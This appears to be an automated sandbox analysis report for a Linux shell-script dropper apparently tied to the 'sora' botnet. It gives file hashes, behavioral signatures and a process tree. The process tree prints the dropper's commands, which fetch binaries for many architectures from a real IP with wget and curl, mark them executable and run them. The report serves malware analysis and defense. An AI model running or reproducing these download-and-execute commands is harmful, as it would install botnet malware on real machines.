Analysis
- max time kernel: 29s
- max time network: 31s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240418-en
- resource tags: arch:mips, image:debian9-mipsbe-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 01-07-2024 10:40

Static task: static1

Behavioral task: behavioral1
- Sample: 103.162.20.166-sora.sh-2024-06-28T114030.sh
- Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
- Sample: 103.162.20.166-sora.sh-2024-06-28T114030.sh
- Resource: debian9-armhf-20240418-en

Behavioral task: behavioral3
- Sample: 103.162.20.166-sora.sh-2024-06-28T114030.sh
- Resource: debian9-mipsbe-20240418-en

Behavioral task: behavioral4
- Sample: 103.162.20.166-sora.sh-2024-06-28T114030.sh
- Resource: debian9-mipsel-20240611-en
General
- Target: 103.162.20.166-sora.sh-2024-06-28T114030.sh
- Size: 1KB
- MD5: 03886bf0d399576fcb6db8c11fcbe06d
- SHA1: 14aee1089d0cf3283da30aa045a454109d1a1c9f
- SHA256: 19e122301b598e2a4a36b685887b7a2c238debfd310fd66b7d719d6454ec6ed2
- SHA512: 8e809a3f916b198d808b61dc2da812c57d36f960a0800b61b2a3ae047c74220dbaa6b0e1c19f421101c831de54b7218204e3447b162c739917ca34d297be178c
Malware Config
Signatures
- Executes dropped EXE (10 IoCs)
  Processes (ioc | pid | process):
    /tmp/robben | 736 | robben
    /tmp/robben | 741 | robben
    /tmp/robben | 773 | robben
    /tmp/robben | 796 | robben
    /tmp/robben | 801 | robben
    /tmp/robben | 836 | robben
    /tmp/robben | 841 | robben
    /tmp/robben | 846 | robben
    /tmp/robben | 851 | robben
    /tmp/robben | 859 | robben
- Reads runtime system information (10 IoCs)
  Reads data from /proc virtual filesystem.
  Processes (description | ioc | process):
    File opened for reading | /proc/sys/crypto/fips_enabled | curl (10 identical entries, one per curl invocation)
- Writes file to tmp directory (11 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes (description | ioc | process):
    File opened for modification | /tmp/sora.arm6 | curl
    File opened for modification | /tmp/sora.arm7 | curl
    File opened for modification | /tmp/sora.m68k | curl
    File opened for modification | /tmp/sora.x86 | curl
    File opened for modification | /tmp/sora.mips | curl
    File opened for modification | /tmp/sora.mpsl | curl
    File opened for modification | /tmp/sora.ppc | curl
    File opened for modification | /tmp/sora.sh4 | curl
    File opened for modification | /tmp/robben | 103.162.20.166-sora.sh-2024-06-28T114030.sh
    File opened for modification | /tmp/sora.arm4 | curl
    File opened for modification | /tmp/sora.arm5 | curl
Processes (process tree; indentation shows parent/child depth, signatures hit by each process are listed beneath it)
- /tmp/103.162.20.166-sora.sh-2024-06-28T114030.sh
  command: /tmp/103.162.20.166-sora.sh-2024-06-28T114030.sh
  signatures: Writes file to tmp directory
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.x86
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.x86
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.x86
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.mips
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.mips
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.mips
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.mips sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.mpsl
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.mpsl
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.mpsl
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.arm4
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.arm4
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.arm4
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.arm5
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.arm5
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.arm5
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.arm6
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.arm6
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.arm6
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.arm7
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.arm7
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.arm7
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.ppc
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.ppc
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.ppc
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.m68k
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.m68k
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.m68k
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
  - /usr/bin/wget: wget http://103.162.20.166/bins/sora.sh4
  - /usr/bin/curl: curl -O http://103.162.20.166/bins/sora.sh4
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat: cat sora.sh4
  - /bin/chmod: chmod +x 103.162.20.166-sora.sh-2024-06-28T114030.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh4 sora.x86 systemd-private-0d8026cf2935495f8f927fce445134b8-systemd-timedated.service-bP3Dt2
  - /tmp/robben: ./robben Payload
    signatures: Executes dropped EXE
Network
MITRE ATT&CK Matrix
Downloads